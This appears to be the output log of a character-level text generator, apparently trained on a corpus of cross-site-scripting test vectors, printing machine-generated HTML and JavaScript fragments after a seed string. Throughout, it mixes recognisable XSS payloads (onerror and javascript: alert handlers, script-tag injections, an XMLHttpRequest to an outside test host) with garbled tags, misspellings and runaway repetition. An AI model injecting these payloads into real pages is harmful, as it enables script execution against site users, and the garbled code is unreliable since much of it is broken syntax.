[*] Total Characters: 36896
[*] Total Vocab: 116
[*] Total Patterns: 36884
[*] Seed: ',/)) name=is'

Trusted,MouseEvent,){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+
3E%3C/svg%3E"/><fmaee xlink:href="data:image/svg+xml,%3Csvg 20xmlns%3D%22http%3A%2F%2Fwwwle%3E%3C%2Fscript%3Ealert(1)%3C/script%3E%3C/xsl:transform%versson="1</"frol="wsitet-></forl>
<utyle>*[{}@impor
v><iframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">script> document.ge
k:href" begin="accessKey(a)" to="//example.com/?c" /></image></svg>
<oframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</
ad=%22frntent.framms[0].document.write(%22quot;<script>r=new XMLHttpRequest();r.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.substr(150,41));}
'malicieus cadEtim.tend(null); }; </script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%
</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script
5,99,107),isTrusted:true;test.type=%22click%22;getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTM
st();r.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">script> do
rt(1)>/script>">script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<s
le="background:url(hxtp://foo.f)\20url(javascript:alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(
15&#99&#114&#105&#112&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#10
ciPjxzY3JpcHQ%2BYWxl2BlZ010PW9;d2Al3A\>Dg&Ba3oas AD4ttyle>
-<in*tteoss%=5 2B<svg smcgs="x- <<xmnt 2auine(cndcfio.aopmie ; </script>
<script> document.getElementById(%div2").innerHTML;</script>
<script
<svg xmlns="http://www.w3.org/1000/svg"><scth d="M0,0" style="madghroond:jrdy"><iframe srl="224<4%25 20%62%65%65%65%65%75%65%75%65%)5 %6 %6  6 <almment aateoetype="sostpe"/>
<?xml-stylesheet type="tex
lert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><!
mmlnid='22xrite('<script>'%2Blocation.hash)substr(1)) }</script><iframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</titl
bstr(1)) }</script><iframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">sc
%73%63%72%69%70%74>
<script> var+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new
al><if expr="new ActiveXObject(%htmlfile').parentWindow.alert(1)"></dire <dtr sac tooreo=alert(1)"></dire <dtr sac tooreo=alert(1)"></dire <dtr sac tooreo=alert(1)"></dire <dtr sac tooreo=alert(1)"></
etept src="#2>0iarictt>
<svsle>'[ff[rior:url(#default#tmm);position:absolute;" onclick="alert(1)">
<a href="javascript:alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)<
form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input autofocus>
<input onblur=focus() autofocus><input>
<form id=test onformihange=alert(1)
></dire <
:xx`onerror=alert(1)>/script>">script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHT
></one>
<!-- Up to Opera 11.x --><div style=content:url(test..svg)a);fill:url(#b);filtee:url(#data:image/svg+xml,%3Csvg 20xmlns%3D%22http%3A%2F%2Fwwwle%3E%3C%2Fscript%3Ealert(1)%3C/script%3E%3C/xsl:tr
t classid="clsid:0BBF25D5-440Bb%253e%25%62%65%61%65%65%)5 %6 %6  6 <almment aateoetype="sostpe"/>
<?xml-stylesheet type="text/ cols="50" rows="10"></textarea><script>ta.appendChild(clone); alert(tasul
8e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3C/xsl:transform%versson="1</"frol="wsitet-></forl>
<utyle>*[{}@import'test.css?]{color: green;}</style>X
<div style="font-family:'sans\27\2

[*] done
